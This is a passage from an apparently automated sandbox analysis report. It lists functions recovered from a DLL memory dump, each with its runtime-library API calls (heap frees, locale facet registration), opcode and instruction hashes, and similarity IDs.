                                                                                                                                  • Opcode Fuzzy Hash: 5195ae5fe1ba27b78dce64a43bb060e5bbb0142ffaecce9ce4d23e93c20746c1
                                                                                                                                  • Instruction Fuzzy Hash: A591E971D14311AFEB205FF98C556BF7AAC9FA2794F404C1CE844AB681EB74C941CBA2
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 6E93B2E8
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA15
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA27
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA39
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA4B
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA5D
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA6F
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA81
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA93
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAA5
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAB7
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAC9
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CADB
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAED
                                                                                                                                  • _free.LIBCMT ref: 6E93B2DD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93B2FF
                                                                                                                                  • _free.LIBCMT ref: 6E93B314
                                                                                                                                  • _free.LIBCMT ref: 6E93B31F
                                                                                                                                  • _free.LIBCMT ref: 6E93B341
                                                                                                                                  • _free.LIBCMT ref: 6E93B354
                                                                                                                                  • _free.LIBCMT ref: 6E93B362
                                                                                                                                  • _free.LIBCMT ref: 6E93B36D
                                                                                                                                  • _free.LIBCMT ref: 6E93B3A5
                                                                                                                                  • _free.LIBCMT ref: 6E93B3AC
                                                                                                                                  • _free.LIBCMT ref: 6E93B3C9
                                                                                                                                  • _free.LIBCMT ref: 6E93B3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction ID: eb78d8570a4bbdc9c95a2e08f4bf35dd40646a14c0041922e4eb7bc93e1da6a4
                                                                                                                                  • Opcode Fuzzy Hash: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction Fuzzy Hash: FB317E31605A219FEB609BB9E844BDAB3FCAF51354F744819E454D6269EF30EC54CF10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • _free.LIBCMT ref: 6E9332BF
                                                                                                                                  • _free.LIBCMT ref: 6E9332D8
                                                                                                                                  • _free.LIBCMT ref: 6E933316
                                                                                                                                  • _free.LIBCMT ref: 6E93331F
                                                                                                                                  • _free.LIBCMT ref: 6E93332B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast
                                                                                                                                  • String ID: C
                                                                                                                                  • API String ID: 3291180501-1037565863
                                                                                                                                  • Opcode ID: d594f339bbfa94ae45436fc395ad65c7652d6c7369d1eed73915f87715df27c7
                                                                                                                                  • Instruction ID: ed8a075b3687f1ef9bae86a4afd6dfa99254e542ee22670e7f213bffc20a41de
                                                                                                                                  • Opcode Fuzzy Hash: d594f339bbfa94ae45436fc395ad65c7652d6c7369d1eed73915f87715df27c7
                                                                                                                                  • Instruction Fuzzy Hash: 51C16F7594122ADFDB24CF68C898A9DB3B8FF49304F6045AAD819A7354D731EE90CF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905681, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905688
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905692
                                                                                                                                  • int.LIBCPMT ref: 6E9056A9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9056E3
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905703
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905710
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90571D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction ID: 70cb1188cd3bd5326050782a795dcf9589d5bb0d0713073cc7b52933c554cb35
                                                                                                                                  • Opcode Fuzzy Hash: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction Fuzzy Hash: 9921BE71900619DBCF12CFE8C9446EEBBB9AF94758F504D0DE8506B280CBB0D946CF81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7D9F, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7DA6
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7DB0
                                                                                                                                  • int.LIBCPMT ref: 6E8F7DC7
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7E01
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7E21
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7E2E
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7E3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction ID: 62cd371ed5acbed92dd8687ec074053403f710fd931aeef3bd0212afc5d21419
                                                                                                                                  • Opcode Fuzzy Hash: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction Fuzzy Hash: 8F21C37190061ADBCF02DFE8C9556EE7BB9AF45798F104D0EE8506B280DBB4DE06CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E93D196: _free.LIBCMT ref: 6E93D1BB
                                                                                                                                  • _free.LIBCMT ref: 6E93D4F9
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93D504
                                                                                                                                  • _free.LIBCMT ref: 6E93D50F
                                                                                                                                  • _free.LIBCMT ref: 6E93D563
                                                                                                                                  • _free.LIBCMT ref: 6E93D56E
                                                                                                                                  • _free.LIBCMT ref: 6E93D579
                                                                                                                                  • _free.LIBCMT ref: 6E93D584
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction ID: 1d6ea0232c3b17981f01e70afe98d97150181f461490c57587651ce70f166d46
                                                                                                                                  • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction Fuzzy Hash: 99118131951B24ABE520ABF0CC09FCB77AE5FA1708F904D14E29966262DB34F5188EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1C96, Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C9D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1CA7
                                                                                                                                  • int.LIBCPMT ref: 6E8F1CBE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F1CE1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1CF8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1D18
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1D25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction ID: 25b3e64841940af01c0726f8d2e04ccf7593446a050bdbc4f0793be7161eef49
                                                                                                                                  • Opcode Fuzzy Hash: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction Fuzzy Hash: 6A11A071900619CBCB01DBE8C9547EDBBB9AF85398F244D08D4106B291DF78994B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F76A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F76AA
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F76B4
                                                                                                                                  • int.LIBCPMT ref: 6E8F76CB
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F76EE
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7705
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7725
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7732
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: bc1c7e844a45d9e42bbf48954f26c998c10ef990978bc47933128bb72f022cc7
                                                                                                                                  • Instruction ID: afc37bdf51097a3f4d9e8732628360971be9f2a493777e728531e9b3d8e27067
                                                                                                                                  • Opcode Fuzzy Hash: bc1c7e844a45d9e42bbf48954f26c998c10ef990978bc47933128bb72f022cc7
                                                                                                                                  • Instruction Fuzzy Hash: DF01ED3191061ACBCB01DBE8C954AEDB7B9AF853A8F114C08D8106B2C0DB74D90BCB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7615
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F761F
                                                                                                                                  • int.LIBCPMT ref: 6E8F7636
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7659
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7670
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7690
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F769D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: aa920c784afd7c0b5a05082a07aefc037d607c27282b2d292fb4f4cc37df7121
                                                                                                                                  • Instruction ID: 240f73b79692adb266f9e352a6cceda0ba1cb31d7153e4a98ae88e4c048d88c1
                                                                                                                                  • Opcode Fuzzy Hash: aa920c784afd7c0b5a05082a07aefc037d607c27282b2d292fb4f4cc37df7121
                                                                                                                                  • Instruction Fuzzy Hash: 1301E131900619DBCB01DFE8C8546ED77796F853A8F214D19D4106B2C0DF74D94B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F6FA7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6FAE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6FB8
                                                                                                                                  • int.LIBCPMT ref: 6E8F6FCF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6FF2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7009
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7029
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7036
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: 1bf6b899ca101f06567fbfbbed79e65931f40c395f16963f4a753757d9e63fa6
                                                                                                                                  • Instruction ID: 641ef61c77950bc5d8721f6d2b253bb4c85b23ef45c02d880657e616d279af3f
                                                                                                                                  • Opcode Fuzzy Hash: 1bf6b899ca101f06567fbfbbed79e65931f40c395f16963f4a753757d9e63fa6
                                                                                                                                  • Instruction Fuzzy Hash: AE01003290061ADBCF01DBE8C944AED7BBAAF95398F100D09E4106B2C0DF709907CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F77CD, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F77D4
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F77DE
                                                                                                                                  • int.LIBCPMT ref: 6E8F77F5
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7818
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F782F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F784F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F785C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: a656823e91607e937b017622b5daf447ed7c11b26feaf54d0728b322e38f090d
                                                                                                                                  • Instruction ID: e9d54880b63d4297d821e5a849d6e6e4b2f9fe06f028f4bb3899fcccbeecd907
                                                                                                                                  • Opcode Fuzzy Hash: a656823e91607e937b017622b5daf447ed7c11b26feaf54d0728b322e38f090d
                                                                                                                                  • Instruction Fuzzy Hash: CB01AD7191061ADBCF01DBE8C854AEE7B7AAF85798F110D09D8207B2C0DFB4994BCB85
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F6F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6F19
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6F23
                                                                                                                                  • int.LIBCPMT ref: 6E8F6F3A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6F5D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F6F74
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F6F94
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F6FA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: d1030b06d2f5aa4121ea26ec50ad6b57fbb90372484cb71ff553ba46f0a8e890
                                                                                                                                  • Instruction ID: fb9337e4f7512081448f26087920015ea042424f418dd1f09609624ad285655d
                                                                                                                                  • Opcode Fuzzy Hash: d1030b06d2f5aa4121ea26ec50ad6b57fbb90372484cb71ff553ba46f0a8e890
                                                                                                                                  • Instruction Fuzzy Hash: F601007190061ACFCF01DBE8C9546EDB7BAAF853A8F100D08E4107B280DF749D078B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F773F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7749
                                                                                                                                  • int.LIBCPMT ref: 6E8F7760
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7783
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F779A
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F77BA
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F77C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: faf2082c7afb7bd9763d18addb3220ca3261c5e75caf2aabfa48005d1af7bd5f
                                                                                                                                  • Instruction ID: b3061b1730628ee052c02a71ad862e3970b0d98f4f76a6cdc7e4c448357d2560
                                                                                                                                  • Opcode Fuzzy Hash: faf2082c7afb7bd9763d18addb3220ca3261c5e75caf2aabfa48005d1af7bd5f
                                                                                                                                  • Instruction Fuzzy Hash: 4E010431910516CBCF01DBE8C954AFDB7796F99398F100C09D8107B2D0DF70990B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9054C2, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9054C9
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9054D3
                                                                                                                                  • int.LIBCPMT ref: 6E9054EA
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E90550D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905524
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905544
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905551
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: a06535d85f0b3ea2673badb76d1f2055795cb7b6462a15ea719969377ba90d4d
                                                                                                                                  • Instruction ID: f5696bb098a0e7b2ed37def93ee7a32f4ece3faac1e19897fcf2bc001d178cfa
                                                                                                                                  • Opcode Fuzzy Hash: a06535d85f0b3ea2673badb76d1f2055795cb7b6462a15ea719969377ba90d4d
                                                                                                                                  • Instruction Fuzzy Hash: 7701ED71900615DBCF11DBE8C854AEDB7BAAF85358F504C0DD8206B280DB74DE46CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905557, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90555E
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905568
                                                                                                                                  • int.LIBCPMT ref: 6E90557F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E9055A2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9055B9
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9055D9
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9055E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: c1ea7862f15c28b928574993d6450b2d3595b8ede1b35c607808d22499b76cd5
                                                                                                                                  • Instruction ID: d66bf114ecf11d8b128a724da7dd0f1daab3a55ac3769e12fc767a5f95a6ee05
                                                                                                                                  • Opcode Fuzzy Hash: c1ea7862f15c28b928574993d6450b2d3595b8ede1b35c607808d22499b76cd5
                                                                                                                                  • Instruction Fuzzy Hash: 49010072900619DBCF21DBE8C9456ED77BAAF953A8F600D0CD4106B280DF74DA46CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7290, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7297
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F72A1
                                                                                                                                  • int.LIBCPMT ref: 6E8F72B8
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F72DB
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F72F2
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7312
